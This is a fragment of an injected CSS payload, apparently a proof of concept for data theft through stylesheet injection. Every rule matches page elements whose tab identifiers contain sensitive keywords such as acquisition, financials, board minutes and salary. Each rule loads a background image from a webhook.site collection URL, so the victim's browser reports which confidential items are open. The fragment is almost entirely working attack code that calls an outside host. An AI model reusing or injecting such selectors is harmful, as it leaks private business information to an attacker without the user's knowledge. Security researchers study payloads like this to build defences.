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webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/FIRE)!important}div[data-tab-id*=&quot;acme-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-acquisition)!important}div[data-tab-id*=&quot;q3-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q3-financials)!important}div[data-tab-id*=&quot;board-minutes&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/board-minutes)!important}div[data-tab-id*=&quot;codex-poc-project&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/codex-poc-project)!important}div[data-tab-id*=&quot;salary-2026&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/salary-2026)!important}div[data-tab-id*=&quot;project-titan&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/project-titan)!important}.m{color:red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